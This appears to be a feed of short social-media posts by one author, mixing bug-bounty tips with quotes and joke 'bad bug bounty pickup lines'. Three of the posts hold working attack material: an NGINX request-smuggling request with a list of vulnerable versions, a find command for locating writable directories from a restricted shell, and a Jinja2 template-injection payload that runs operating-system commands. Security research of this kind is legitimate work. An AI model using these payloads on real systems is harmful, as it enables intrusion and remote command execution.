Abdullah MD. Shaleh

#bugbountytips #bugbounty NGINX error_page request smuggling Example Vulnerable Request GET /a HTTP/1.1 Host: localhost Content-Length: 56 GET /_hidden/index.html HTTP/1.1 Host: notlocalhost. Vulnerable Versions: 1.8.1 1.8.1 1.9.5 1.14.1 1.14.2 1.15.9 1.16.1 1.17.6

Life is weird. First you wanna grow up, then you want to be a kid again.

If you're on a very restrictive Linux shell, this command will find writable directories for you. find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

I improved the #PayloadAllTheThings Jinja2 SSTI command execution payload. /?cmd={% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}&input=ls

Sometimes people don’t want to hear the truth because they don’t want their illusions destroyed.

You must be an RCE because you’re the answer to all my prayers #BadBugBountyPickupLines

I think u Xss'd me coz every thought is being redirected towards you. #BadBugBountyPickupLines